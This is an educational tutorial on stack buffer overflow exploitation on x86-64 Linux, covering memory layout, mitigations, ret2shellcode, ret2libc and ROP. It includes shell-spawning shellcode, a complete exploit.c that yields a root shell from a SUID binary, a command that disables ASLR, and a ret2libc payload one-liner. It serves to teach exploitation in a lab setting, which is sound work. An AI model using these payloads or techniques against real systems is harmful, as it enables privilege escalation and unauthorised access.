Exploit Development 101

In this article, I’m going to walk you through writing exploits that target specific vulnerabilities. Developing exploit code can be tricky, but we’ll break it down into steps until we have a working exploit. We’ll start by understanding the different types of vulnerabilities we’re dealing with and how to identify them. For background, I recommend this great series by Pico: Programming Course for Wannabes.

A quick reminder on memory, to reset the context. The principle of exploiting a buffer overflow is to overwrite parts of memory that attacker input shouldn’t be able to control, so that the process executes attacker-chosen code or changes control flow. To see how and where an overflow takes place, let’s look at how memory is organized in a 64‑bit process.

Code (.text) section: contains the machine instructions the CPU executes. On x86‑64 the instruction pointer is RIP; it always contains the address of the next instruction to be executed. Control flow changes via CALL, RET, JMP or indirect transfers (function pointers, vtables).

Data sections: globals/statics live in .data (initialized) and .bss (zeroed). Corrupting these changes program state or pointers.

Heap: dynamic allocations from the allocator (malloc/new). Heap corruption (overwrites, metadata corruption, use‑after‑free) gives different primitives than stack bugs.

Stack: used for arguments, return addresses, saved registers and locals. The user‑space stack is usually mapped at a high virtual address and grows down (toward lower addresses). The stack pointer is RSP and points at the top of the stack. PUSH decrements RSP then stores a value at the new top; POP loads from the top then increments RSP. Overwriting a saved return address (or saved RBP) is the classic stack‑based overflow.
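The PUSH/POP behaviour described above can be sketched with a toy model. This is only an illustration: the ToyStack class and the starting address are made up for the example, and a real stack is plain process memory rather than a dictionary.

```python
# Toy model of the x86-64 stack: memory is a dict keyed by address,
# RSP moves down by 8 on push and back up by 8 on pop.

class ToyStack:
    def __init__(self, top=0x7FFFFFFFE000):  # hypothetical starting RSP
        self.rsp = top
        self.mem = {}

    def push(self, value):
        self.rsp -= 8                # PUSH: decrement RSP first...
        self.mem[self.rsp] = value   # ...then store at the new top

    def pop(self):
        value = self.mem[self.rsp]   # POP: load from the top...
        self.rsp += 8                # ...then increment RSP
        return value


stack = ToyStack()
start = stack.rsp
stack.push(0x401179)         # e.g. a return address pushed by CALL
stack.push(0x7FFFFFFFDEA0)   # e.g. a saved RBP pushed by the prologue
print(start - stack.rsp)     # two 8-byte slots below where we started
```

Popping twice returns the values in reverse order and leaves RSP back at its starting value, which is exactly what a matched prologue/epilogue relies on.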

Next, let’s take a look at an example of a simple function, modern style. A function is a piece of code in the code segment that is called, performs a task, and then returns to the caller. Arguments are usually passed in registers on x86‑64.

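memory address        code
0x400500 <main+X>     pushq $0x0                 ;  push a value onto the stack
0x400507              call 0x400520 <function>   ;  CALL pushes return RIP
...
0x400520 <function>   pushq %rbp                ; save the caller's frame pointer
0x400521              movq  %rsp, %rbp          ; start a new frame
0x400524              subq  $0x40, %rsp         ; reserve 0x40 (64) bytes for locals
0x400528              ; [local buffer lives here]
0x400528              popq  %rax                ; load 8 bytes from the top of the stack
0x40052b              addq  $0xf00, %rax
0x400532              leave                     ; mov %rbp,%rsp ; pop %rbp
0x400533              ret                       ; pop the return address into RIP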

CALL automatically pushes the return address (RIP of the instruction after CALL). The function prologue saves RBP and makes a frame; locals (buffers) live below saved RBP. On x86‑64 the saved RBP and return address are 8 bytes each.

   HIGH ADDR
   0x7fff... +----------------------+  <- caller frame
             |  spilled args / args |
             +----------------------+
             |  return address (8)  |  <- pushed by CALL
             +----------------------+
             |  saved RBP (8)       |  <- pushed by callee prologue
             +----------------------+
             |  local vars / buffer |  <- buffer[0] .. buffer[n-1]
             +----------------------+
   LOW ADDR (grows down)

Commonly, a function saves the frame pointer RBP at the start (pushq %rbp; movq %rsp,%rbp) and restores it before returning. Inside the function you reference locals as offsets from RBP ([RBP-8], [RBP-16], …).

We just need to know the stack layout. At the top (higher addresses) is the caller’s frame, including any arguments passed on the stack. Below that comes the return address (8 bytes) pushed by CALL, then the saved RBP (8 bytes) pushed by the prologue, and below that the local buffers and variables that belong to the function. For a function with a single 32-byte buffer, and assuming the compiler adds no padding, the offsets measured from buffer[0] look like this:

  local buffer: bytes 0 .. 31   (32 bytes)
  saved RBP  : bytes 32 .. 39   (8 bytes)
  return addr: bytes 40 .. 47   (8 bytes)

So writing 40 bytes clobbers the saved RBP but not the return address; the 41st byte starts corrupting the return address (its least significant byte); and 48 bytes (0..47) fully overwrite it and can change RIP. x86‑64 is little‑endian, so the target address is written least significant byte first.
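The arithmetic above is easy to check with a few lines of Python. This is a minimal sketch for the 32-byte example layout only; the constant and function names are invented for the illustration, and a real frame may contain padding that shifts these offsets.

```python
import struct

BUF_END = 32   # buffer occupies offsets 0..31
RBP_END = 40   # saved RBP occupies offsets 32..39
RET_END = 48   # return address occupies offsets 40..47

def fields_touched(n_bytes):
    """Which saved fields does a write of n_bytes from buffer[0] reach?"""
    touched = []
    if n_bytes > BUF_END:
        touched.append("saved RBP")
    if n_bytes > RBP_END:
        touched.append("return address")
    return touched

def pack_address(addr):
    """64-bit little-endian encoding: least significant byte first."""
    return struct.pack("<Q", addr)

for n in (32, 40, 41, 48):
    print(n, fields_touched(n))
print(pack_address(0x401166).hex())
```

The last line shows why byte order matters: the low byte 0x66 of the address is the first byte written into the return-address slot.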

Dynamically allocated variables (those created with malloc()) are placed on the heap. Whether the heap grows up or down is implementation and platform dependent: on many systems it grows toward higher addresses, but that is not a universal guarantee. In a simple heap-based buffer overflow, we overflow a heap buffer and overwrite adjacent heap data, for example other dynamic allocations or allocator metadata, which can lead to corruption, crashes, or exploitable behavior depending on the allocator and layout.

The stack, by contrast, is a separate region used for function locals, return addresses, and saved registers. On many architectures the stack grows from high addresses toward low addresses, but again this is implementation dependent. The stack changes through instructions that adjust the stack pointer and read or write memory, for example PUSH/POP on many ISAs, or explicit adjustments like subl $20, %esp on 32-bit x86. PUSH adjusts the stack pointer and then stores the value at the new top; POP reads the value from the top of the stack and then adjusts the pointer back.

Stack-based overflows are the classic ones you’ve probably heard about. They happen when you copy more data into a local buffer than it can hold. Functions like strcpy(), strcat(), sprintf(), or the infamous gets() don’t care about boundaries; they’ll just keep writing until something breaks. Let’s start with the vulnerable code so we can walk through it step-by-step and make this crystal clear.

#include <stdlib.h>
#include <string.h>

void overflow_function (char *str)
{
  char buffer[20];
  strcpy(buffer, str);  // Copies str into buffer with no bounds check
}

int main()
{
  char big_string[128];
  int i;

  for(i=0; i < 127; i++)  // Loop 127 times
  {
    big_string[i] = 'A'; // And fill big_string with 'A's
  }
  big_string[127] = '\0'; // Terminate it so strcpy copies exactly 128 bytes
  overflow_function(big_string);
  exit(0);
}

The function tries to write 128 bytes of data into the 20-byte buffer. The extra 108 bytes spill out, overwriting the stack frame pointer, the return address, and the str pointer function argument. Then, when the function finishes, the program attempts to jump to the return address, which is now filled with As (0x41 in hexadecimal).

The program tries to return to this address. On 32-bit x86 that sends EIP to 0x41414141 (on x86‑64 the overwritten slot holds 0x4141414141414141, a non-canonical address, so the RET itself faults). Either way the target is just some random address that is in the wrong memory space or contains invalid instructions, so the program crashes and dies. When overflow_function() is called, the stack frame looks something like this:

  _________          ___________________________          __________________
 |         |        |                           |        |                  |
 | buffer  |------->| Stack frame pointer (sfp) |------->|  return address  |
 |         |        |                           |        |      (ret)       |
 |_________|        |___________________________|        |__________________|
    _________________________
   |                         |
   |  *str (function arg)    | ---> [[[The Rest of the Stack]]]
   |_________________________|

The crash that results from a stack-based overflow isn’t really that interesting, but the reason it crashes is. If the return address were controlled and overwritten with something other than 0x41414141, such as an address where actual executable code was located, then the program would “return” to and execute that code instead of dying. And if the data that overflows into the return address is based on user input, such as the value entered in a username field, the return address and the subsequent program execution flow can be controlled by the user.

Because it’s possible to modify the return address to change the flow of execution by overflowing buffers, all that’s needed is something useful to execute. This is where machine code injection comes into the picture. Shellcode is just a cleverly designed piece of assembly code that is self-contained and can be injected into buffers.

— ret2 —

The most common piece of injected machine code is known as shellcode, because it typically just spawns a shell. If a suid root program is tricked into executing shellcode, the attacker gets a shell with root privileges, while the system believes the suid root program is still doing whatever it was supposed to be doing. Hence ret2shellcode (return to shellcode).

But of course there’s a catch. OSes mark large swaths of memory as non-executable. Stacks and heaps are usually NX (non-executable) by default, so even if you manage to inject shellcode on the stack, the CPU will refuse to run it. Poof: the old “ret > stack-shellcode” trick is dead on arrival.

Enter the next layer of nastiness: ASLR (or KASLR in the kernel). It randomizes base addresses for the stack, heap, libc and friends at process start. If you can’t predict where things live, you can’t reliably overwrite a return address to point at your shellcode or some fixed libc function.

Then come stack canaries (stack protectors). Compilers can insert a tiny secret value, a “canary”, between local buffers and control data. If an overflow trashes the return address, it usually trashes the canary too; the function checks the canary before returning and kills the process if it’s corrupted. This kills silent return-address overwrites dead, which is why CTFs and intentionally vulnerable programs are often compiled without stack protectors.
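To make the canary idea concrete, here is a toy model of a frame laid out as buffer, canary, saved RBP, return address. Everything in it is an assumption made for illustration (the 32-byte buffer, the field order, the helper names); real compilers emit this check in the function prologue and epilogue, not in a library call.

```python
import os

BUF = 32  # hypothetical size of the local buffer

def new_frame(canary):
    # Lowest address first: buffer | canary | saved RBP | return address
    return bytearray(BUF) + bytearray(canary) + bytearray(8) + bytearray(8)

def unchecked_copy(frame, data):
    # Like strcpy: writes from buffer[0] upward with no bounds check.
    # Truncated only so the toy model stays inside its own bytearray.
    n = min(len(data), len(frame))
    frame[:n] = data[:n]

def canary_intact(frame, canary):
    # The epilogue check: compare the stored copy with the reference value.
    return bytes(frame[BUF:BUF + 8]) == canary


canary = os.urandom(8)            # chosen once at startup, secret to the attacker
frame = new_frame(canary)
unchecked_copy(frame, b"A" * 56)  # enough to reach the return address
print("canary intact:", canary_intact(frame, canary))
```

A write that stays within the 32 bytes leaves the check passing; anything long enough to reach the return address has to cross the canary first, and without knowing its value the overwrite is detected.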

Then there are W^X, PaX, exec-stack controls and kernel-level mitigations. Do they make exploitation impossible? Nah, they just make it much harder. They ain’t a panacea.

When NX is present, you can still move to code reuse. What I mean by that is something like ret2libc, which is basically the lazy cousin of shellcode: you don’t inject new code, you reuse the C library. In a ret2libc attack the attacker overwrites a return address so execution hops into libc functions (think system()), often with a pointer to “/bin/sh”, or by leveraging execl()/execve() calls. No shellcode required, just a spot to stash a string and a predictable address to call. It’s simple, elegant, and brutally effective when ASLR or PIE aren’t getting in your way.

The program itself doesn’t do much; it just mismanages memory. To make it really dangerous we’d change ownership to root and flip on the SUID bit so that when anyone runs the binary it executes with root privileges:

#include <string.h>

int main(int argc, char *argv[])
{
  char buffer[500];
  strcpy(buffer, argv[1]); // Vuln: no length check on argv[1]
  return 0;
}

If that binary is vulnerable to a stack buffer overflow, and we somehow make it execute our code, whatever we run will run with root privileges. That’s why SUID bugs are so attractive.

sudo chown root f00
sudo chmod +s f00
ls -l f00
-rwsr-sr-x 1 root users 4933 Sep 5 15:22 f00

We’ll set this up so the hardenings are in place and we can show how they block attacks. Then we’ll cover ret2libc and ROP techniques and walk through an example that uses an info leak to build a real exploit. But first, let’s start in basic, easy-mode CTF style.

First we need shellcode whose purpose is to give us a root shell, and we need to jump to it. That means the actual address of the shellcode must be known or approximated ahead of time, which can be difficult on a dynamically changing stack. Even if the address is approximated well, the return address in the stack frame must be overwritten correctly; otherwise, the program will just crash. Two techniques are commonly used to improve the likelihood of success.

The first is known as a NOP sled (NOP is short for “no operation”). On x86 architectures, a NOP instruction does nothing and consumes a single byte. In this context, NOPs are used as a “fudge factor”: by creating a run of NOPs before the shellcode, we only need the instruction pointer to land anywhere in the sled, and execution will slide through the NOPs into the shellcode, which will then execute properly.

The second technique is flooding the end of the buffer with repeated candidate return addresses. This increases the probability that the overwritten return address points somewhere in the NOP sled or directly to the shellcode.

  __________       ___________        _________________________
 |          |     |           |      |                         |
 | NOP sled | --->| ShellCode | ---> | Repeated return address |
 |__________|     |___________|      |_________________________|
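The layout in the diagram can be sketched as a byte string. This is a layout illustration only: build_layout and its parameters are hypothetical names, the body is a run of 0xCC (int3) placeholder bytes rather than real shellcode, and the offset and address are borrowed from the debugging session later in the article.

```python
import struct

def build_layout(bytes_to_ret, body, guess_addr, sled_len, repeats=4):
    """NOP sled + body + filler up to the saved return address + repeated guess."""
    if sled_len + len(body) > bytes_to_ret:
        raise ValueError("sled and body do not fit before the return address")
    sled = b"\x90" * sled_len                           # 0x90 is the x86 NOP
    filler = b"A" * (bytes_to_ret - sled_len - len(body))
    tail = struct.pack("<Q", guess_addr) * repeats      # candidate return addresses
    return sled + body + filler + tail


placeholder = b"\xcc" * 8   # stand-in bytes, not shellcode
layout = build_layout(72, placeholder, 0x7FFFFFFFDE40, sled_len=20, repeats=2)
print(len(layout), layout[72:80].hex())
```

One caveat worth keeping in mind: 64-bit user-space addresses have zero high bytes, so when the input travels through strcpy() or argv only the first copy of the address arrives, and even that one is cut at its first zero byte.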

Even using these techniques, the approximate location of the buffer in memory must be known. In simple lab programs, the buffer may be near the stack pointer, so the return address can be approximated relative to it. However, as mentioned earlier, this often won’t work on a real system because of things like the red zone, ASLR, and NX. Therefore we’ll keep it simple until we cover other techniques and tie everything together.

Reference: Programming for Wannabes. Part III. Your First Shell Code

— Write Your First Exploit —

Writing an exploit as a compiled program can certainly get the job done, but it introduces a barrier between the developer and the vulnerable application. The compiler handles many aspects of the exploit, which removes a layer of interactivity that is crucial for exploration and experimentation.

We assume ASLR (Address Space Layout Randomisation) is disabled. To gain a full understanding of this process, the ability to quickly test different scenarios is vital. With just a few tools, specifically Python and command substitution, you can effectively exploit a vulnerable program.

$ python3 -c 'print("A"*20)'
$ python3 -c 'print("\x41"*20)'

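Each command prints the character A 20 times; both yield AAAAAAAAAAAAAAAAAAAA. The second form matters because exploit development often needs non-printable characters, which can be written as \x escapes (for bytes above 0x7f, write raw bytes with sys.stdout.buffer.write instead, since print() encodes them as UTF-8). This output can be fed directly to our vulnerable program. Before that, let’s see which protections are enabled on the binary. This can be done with the checksec tool: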

	Arch:     amd64-64-little
	RELRO:    Partial RELRO
	Stack:    No canary found
	NX:       NX disabled
	PIE:      No PIE (0x400000)
	RWX:      Has RWX segments

Arch: the architecture of the binary.

Stack: whether stack canary protection is enabled.
NX: whether non-executable stack protection is enabled.
PIE: whether the binary is a Position Independent Executable.
RWX: whether the binary has read-write-executable segments.

RELRO: whether the GOT section is read-only. There are three situations:

No RELRO: the GOT is writable and is placed after the global variables.
Partial RELRO: the sections are reordered so the GOT comes before the global variables, but the part of the GOT used by the PLT (.got.plt) is still writable.
Full RELRO: the whole GOT is read-only and is placed before the global variables.

In this case, canary, NX and PIE are all disabled. Here’s 64-bit shellcode that spawns a shell:

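section .text
    global _start

_start:
    ; Clear registers
    xor rsi, rsi                  ; argv = NULL
    xor rdx, rdx                  ; envp = NULL

    ; Build "/bin//sh" on stack
    push rsi                      ; 8 zero bytes: NUL terminator for the string
    mov rdi, 0x68732f2f6e69622f   ; "/bin//sh" (8 chars, so the encoding has no NUL byte)
    push rdi
    mov rdi, rsp                  ; rdi = pointer to the string

    ; Set up execve syscall
    mov al, 0x3b                  ; 59 = execve; sets only AL, the rest of RAX must already be 0
    syscall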
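The 64-bit immediate loaded into RDI is nothing more than the path string in little-endian byte order. The sketch below decodes two variants: the 7-character "/bin/sh" form and the 8-character "/bin//sh" form that the byte string in exploit.c encodes (2f 62 69 6e 2f 2f 73 68). The helper name is made up for the example.

```python
def immediate_bytes(imm):
    """Bytes of a 64-bit immediate as they appear in the instruction stream."""
    return imm.to_bytes(8, "little")

seven = immediate_bytes(0x68732F6E69622F)     # "/bin/sh" plus one padding byte
eight = immediate_bytes(0x68732F2F6E69622F)   # "/bin//sh", all eight bytes used

print(seven, seven.count(0))
print(eight, eight.count(0))
```

The 7-character form leaves a zero byte inside the instruction encoding, which a strcpy()-style copy would treat as the end of the input. The doubled slash is harmless to the kernel’s path lookup and fills all eight bytes.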

Alright. You can always use Pwntools, which will save you a lot of trouble, but in our case we love to write our own exploits. Remember, this exploit assumes no ASLR and no other mitigations. Let’s jump into it!

First, let’s take a look at the binary to find the stack address we need for our return. You can use plain gdb, but I’ll use pwndbg throughout this piece.

b foo
Breakpoint 1 at 0x401166: file f00.c, line 6.
pwndbg> r AAAAAAAAAAAA...

Breakpoint 1, foo (input=0x7fffffffe2dc 'A' <repeats 79 times>) at f00.c:6
6	    strcpy(buffer, input);
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────[REGISTERS / show-flags off / show-compact-regs off]─────────────────────
 RAX  0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...'
 RBX  0x4011e0 (__libc_csu_init) ◂— endbr64 
 RCX  0x4011e0 (__libc_csu_init) ◂— endbr64 
 RDX  0x7fffffffdfb0 —▸ 0x7fffffffe32c ◂— 'SHELL=/bin/bash'
 RDI  0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAA...'
 RSI  0x7fffffffdf98 —▸ 0x7fffffffe2c5 ◂— 'f00'
 R8   0
 R9   0x7ffff7fe0d60 (_dl_fini) ◂— endbr64 
 R10  0
 R11  0
 R12  0x401070 (_start) ◂— endbr64 
 R13  0x7fffffffdf90 ◂— 2
 R14  0
 R15  0
 RBP  0x7fffffffde80 —▸ 0x7fffffffdea0 ◂— 0
 RSP  0x7fffffffde30 ◂— 0
 RIP  0x401166 (foo+16) ◂— mov rdx, qword ptr [rbp - 0x48]
───[DISASM / set emulate on]────────────────────────────────────────────────────
 ► 0x401166 <foo+16>    mov    rdx, qword ptr [rbp - 0x48]     RDX, [0x7fffffffde38] => 0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...'
   0x40116a <foo+20>    lea    rax, [rbp - 0x40]               RAX => 0x7fffffffde40 —▸ 0x400040 ◂— 0x400000006
   0x40116e <foo+24>    mov    rsi, rdx                        RSI => 0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...'
   0x401171 <foo+27>    mov    rdi, rax                        RDI => 0x7fffffffde40 —▸ 0x400040 ◂— 0x400000006
   0x401174 <foo+30>    call   strcpy@plt                  <strcpy@plt>
 
   0x401179 <foo+35>    nop    
   0x40117a <foo+36>    leave  
   0x40117b <foo+37>    ret    
 
   0x40117c <main>      endbr64 
   0x401180 <main+4>    push   rbp
   0x401181 <main+5>    mov    rbp, rsp
──────────────[ STACK ]──────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffde30 ◂— 0
01:0008│-048 0x7fffffffde38 —▸ 0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
02:0010│-040 0x7fffffffde40 —▸ 0x400040 ◂— 0x400000006
03:0018│-038 0x7fffffffde48 ◂— 0xf0b5ff
04:0020│-030 0x7fffffffde50 ◂— 0xc2
05:0028│-028 0x7fffffffde58 —▸ 0x7fffffffde87 ◂— 0x4011ca00
06:0030│-020 0x7fffffffde60 —▸ 0x7fffffffde86 ◂— 0x4011ca0000
07:0038│-018 0x7fffffffde68 —▸ 0x40122d (__libc_csu_init+77) ◂— add rbx, 1
────────────────[ BACKTRACE ]────────────────────────────────────────────────────
 ► 0         0x401166 foo+16
   1         0x4011ca main+78
   2   0x7ffff7de2083 __libc_start_main+243
   3         0x40109e _start+46
─────────────────────────────────────────────────────────────────────────────────
pwndbg> context stack
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────[ STACK ]────────────────────────────────────────
00:0000│ rsp 0x7fffffffde30 ◂— 0
01:0008│-048 0x7fffffffde38 —▸ 0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....'
02:0010│-040 0x7fffffffde40 —▸ 0x400040 ◂— 0x400000006
03:0018│-038 0x7fffffffde48 ◂— 0xf0b5ff
04:0020│-030 0x7fffffffde50 ◂— 0xc2
05:0028│-028 0x7fffffffde58 —▸ 0x7fffffffde87 ◂— 0x4011ca00
06:0030│-020 0x7fffffffde60 —▸ 0x7fffffffde86 ◂— 0x4011ca0000
07:0038│-018 0x7fffffffde68 —▸ 0x40122d (__libc_csu_init+77) ◂— add rbx, 1
─────────────────────────────────────────────────────────────────────────────────
pwndbg> x/10gx $rsp
0x7fffffffde30:	0x0000000000000000	0x00007fffffffe2dc
0x7fffffffde40:	0x0000000000400040	0x0000000000f0b5ff
0x7fffffffde50:	0x00000000000000c2	0x00007fffffffde87
0x7fffffffde60:	0x00007fffffffde86	0x000000000040122d
0x7fffffffde70:	0x00007ffff7faf2e8	0x00000000004011e0
pwndbg> p &buffer
$1 = (char (*)[64]) 0x7fffffffde40
pwndbg> p $rbp
$2 = (void *) 0x7fffffffde80
pwndbg> x/gx $rbp+8
0x7fffffffde88:	0x00000000004011ca

From that blob we get the important info: the offset to the saved return address is 0x7fffffffde88 - 0x7fffffffde40 = 72 bytes. So the return address starts right after the first 72 bytes written into buffer, and to jump back into our buffer we’d set the saved RIP to an address inside it, starting at 0x7fffffffde40.
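The same subtraction, written out with the values from the gdb session above (the variable names are just labels for this example):

```python
buffer_addr = 0x7FFFFFFFDE40    # from `p &buffer`
rbp = 0x7FFFFFFFDE80            # from `p $rbp`

saved_rip_slot = rbp + 8        # the return address sits just above the saved RBP
offset = saved_rip_slot - buffer_addr

print(hex(saved_rip_slot), offset)
```

This matches the `x/gx $rbp+8` line in the session, which reads the slot at 0x7fffffffde88, and gives the 72 bytes of filler needed before the new return address.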

Here’s a look at exploit.c:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

unsigned char sc[] = 
    "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73"
    "\x68\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";

int main() {
    char buf[200];
    unsigned long buf_addr = 0x7fffffffde40;  
    
    int sc_len = sizeof(sc) - 1;
    printf("Len: %d\n", sc_len);
    printf("Buf @ 0x%lx\n", buf_addr);
    
    // Build payload with NOP sled
    memset(buf, 0x90, sizeof(buf));  
    
    int offset = 20;
    memcpy(buf + offset, sc, sc_len);
    
    // Overwrite return address
    unsigned long *ret = (unsigned long*)(buf + 72);
    *ret = buf_addr + offset;
    
    printf("SC @ 0x%lx\n", buf_addr + offset);
    printf("Ret -> 0x%lx\n", buf_addr + offset);
    
    // Execute vulnerable binary
    char *argv[] = {"./f00", buf, NULL};
    execve("./f00", argv, NULL);
  
    return 1;
}

Finally, compile and execute the exploit:

Buf @ 0x7fffffffde40
Ret -> 0x7fffffffde54
# whoami
root
#

And there you have it! The exploit successfully overwrites the return address on the stack so that it points back into our buffer, just past the NOP sled, at the shellcode. Since the vulnerable program has SUID root permissions, executing this shellcode grants us a root shell.

— Bypassing NX with ret2libc —

Alright, same vulnerable program, but this time we’re playing on hard mode: the stack is non-executable (NX is enabled). We can’t just inject shellcode and jump to it. So what do we do? We borrow code that’s already there. ASLR stays switched off for now:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0

This is ret2libc (return-to-libc). The trick is simple, almost elegant: you don’t inject new code, you reuse the C library. We overwrite the return address not with the address of our shellcode, but with the address of a function already in the process’s memory, like system(). Then, we set up the stack to make it look like system() was called normally with the argument "/bin/sh".

No shellcode required. Just a predictable address to call and a spot to stash a string. It’s simple, and brutally effective when ASLR or PIE aren’t getting in your way. On x86‑64 the first argument travels in RDI rather than on the stack, so something has to load RDI before system() runs. This is where our first ROP gadget comes in. A gadget is a tiny snippet of existing code, usually ending in a ret instruction; here we want pop rdi; ret. Our stack layout needs to be a bit smarter now:

Lower Addresses
┌──────────────────────────────────┐
│ AAAAAA... (overflow data)        │ <- Our input buffer
│ [buffer bytes]                   │
│ [padding to saved RBP (if any)]  │
│ [saved RBP (8 bytes)]            │ <- Overwritten with junk (optional)
├──────────────────────────────────┤
│ [pop rdi; ret gadget addr]       │ <- Saved RIP points here
│ [ptr to "/bin/sh" string]        │ <- Gets popped into RDI (first arg)
│ [system() address]               │ <- `ret` lands here (call system)
│ [exit() address]                 │ <- where system() returns to
└──────────────────────────────────┘
Higher Addresses
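To see why the words are ordered this way, here is a tiny simulator that walks the chain the way the CPU would: every ret pops the next word into RIP, and pop rdi consumes one extra word. The gadget, system() and exit() addresses are the example values used in exploit.c further down; the "/bin/sh" pointer and the simulate function are hypothetical.

```python
POP_RDI = 0x4007C3          # "pop rdi; ret" gadget (example value)
SYSTEM = 0x7FFFF7A33450     # system() (example value)
EXIT = 0x7FFFF7A05E10       # exit() (example value)
BINSH = 0x7FFFFFFFEF00      # hypothetical pointer to "/bin/sh"

SYMBOLS = {POP_RDI: "pop rdi; ret", SYSTEM: "system", EXIT: "exit"}

def simulate(chain):
    """Return a trace of what each word in the chain causes."""
    rdi = 0
    trace = []
    i = 0
    while i < len(chain):
        target = chain[i]        # `ret` pops this word into RIP
        i += 1
        name = SYMBOLS[target]
        if name == "pop rdi; ret":
            rdi = chain[i]       # `pop rdi` takes the next word off the stack
            i += 1
            trace.append(f"rdi <- {rdi:#x}")
        else:
            trace.append(f"{name}(rdi={rdi:#x})")
    return trace


for step in simulate([POP_RDI, BINSH, SYSTEM, EXIT]):
    print(step)
```

The trace shows RDI being loaded first, then system() running with that pointer, then exit() as the place system() returns to. The model ignores that called functions clobber registers, so the rdi value shown for exit() is not meaningful.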

So first let’s get the offset. I’m using a gdb plugin for this (gef and peda both ship pattern helpers; the prompts below come from peda). The flow is simple: generate a cyclic pattern bigger than any input you’ll try, run the program under gdb with that pattern as argv, let it crash, then translate the crashed RIP value back to a pattern offset.

Program received signal SIGSEGV, Segmentation fault.
RAX: 0x0000000000000000
RBX: 0x00007ffff7dd18c0
RCX: 0x00007fffffffdc28
RDX: 0x0000000000000000
RSI: 0x00007fffffffdc70
RDI: 0x00007fffffffdc50
RBP: 0x4141414141414141
RSP: 0x00007fffffffdc10
RIP: 0x4141414141414141
EFLAGS: 0x00010202
...
Stopped reason: SIGSEGV
0x4141414141414141 in ?? ()

Take that RIP value (0x4141414141414141) and feed it to your pattern-offset helper:

gdb-peda$ pattern_offset 0x4141414141414141
152 found at offset: 152
gdb-peda$

So in this hypothetical the saved RIP got clobbered at byte 152 of the input (your number will vary depending on the binary). Use x/xxgx $rbp / x/xxgx $rsp to sanity-check memory and pattern bytes.
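If you want to see what the pattern helpers do under the hood, the idea fits in a few lines. This is a sketch of the well-known "Aa0Aa1Aa2..." style of pattern, not the exact algorithm of any particular plugin, and the function names are invented for the example.

```python
import string

def make_pattern(length):
    """Non-repeating pattern built from upper/lower/digit triples: Aa0Aa1Aa2..."""
    out = []
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for digit in string.digits:
                out.append(up + lo + digit)
                if 3 * len(out) >= length:
                    return "".join(out)[:length].encode()
    raise ValueError("requested length exceeds what this pattern can cover")

def offset_of(value, pattern):
    """value: the 8-byte integer as the debugger shows it (little-endian in memory)."""
    return pattern.find(value.to_bytes(8, "little"))


pattern = make_pattern(300)
# Pretend the debugger showed these 8 bytes in the clobbered return slot:
crashed = int.from_bytes(pattern[152:160], "little")
print(offset_of(crashed, pattern))
```

Because every 8-byte window of the pattern is unique, the value found in the clobbered slot maps back to exactly one input offset.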

Before we try to overwrite things for real, confirm the architecture (32 vs 64-bit), endianness, whether canaries/ASLR/NX are enabled, and whether the target honors execstack/loader rules; otherwise your exploit will fail for reasons that look like “it just crashes”. With that checked, before we write an exploit, let’s see if the idea actually works. Note the 4-byte addresses in this quick run, which is the 32-bit layout (system(), return address, argument):

gdb -q f00
gdb-peda$ run $(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*140 + b"\x80\x17\xe0\xf7" + b"\xc0\x40\xdf\xf7" + b"\xcc\xdd\xff\xff")')
Starting program: /home/pwnme/foo $(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*140 + b"\x80\x17\xe0\xf7" + b"\xc0\x40\xdf\xf7" + b"\xcc\xdd\xff\xff")')
[Attaching after process 3525 vfork to child process 3530]
[New inferior 2 (process 3530)]
[Detaching vfork parent process 3525 after child exec]
[Inferior 1 (process 3525) detached]
process 3530 is executing new program: /usr/bin/dash
[Inferior 2 (process 3530) exited normally]
gdb-peda$

Okay, but wait: how did we get the addresses for system() and exit() in the payload? Let’s back up a little. While we develop the exploit I’ll show you where those addresses come from and how I picked them.

— Your first ROP —

So the trick is simple: we can discover runtime addresses for functions in libc using the dynamic loader. dlopen() loads (or returns a handle to) a shared library, and dlsym() looks up a symbol by name and returns the memory address where that symbol is loaded. You could also grab system/exit from GDB (p system) when debugging. With ASLR off, libc usually maps at the same address in the exploit process as in the target, so the exploit can resolve the addresses itself at runtime with dlopen/dlsym.

Against a target with ASLR, this is usually done by leaking a libc address (for example the puts GOT entry printed via puts@plt), then computing the libc base and the system/exit addresses from their offsets.

void *handle = dlopen("libc.so.6", RTLD_LAZY);
void *system_addr = dlsym(handle, "system");
void *exit_addr = dlsym(handle, "exit");

Next we need a pointer to the string "/bin/sh". Two easy ways to get that at runtime:

Put the string directly into the payload buffer that gets copied by the vulnerable program; or
Stash it in an environment variable (I usually use this because it’s convenient and stable), then retrieve its address with getenv().

Address of EGG: 0xffffde12
Value at that address: "/bin/sh"

Those addresses are just examples; they’ll be different on your system and will move if ASLR is enabled.

Putting the pieces together

We locate the runtime address of system() (via dlsym() or from debugging).
We obtain a pointer to the "/bin/sh" string (via the buffer or an environment variable).
If control flow is redirected so that system() is invoked with that pointer as its argument, system() will spawn a shell (it internally invokes the shell to execute the passed command). When system() returns, execution continues at whatever address follows it in our chain, which is why we place exit() there for a clean shutdown.

What system() does

system() expects one argument: a pointer to a NUL-terminated C string containing the command to run.
Internally it runs the command using the shell (e.g., execve("/bin/sh", ["sh", "-c", cmd], env)), so handing it "/bin/sh" will cause a shell to be executed.
On success you get a child process running that shell; when it finishes, system() returns to its caller, which in a hijacked flow is the next address we placed on the stack (exit() in our layout).

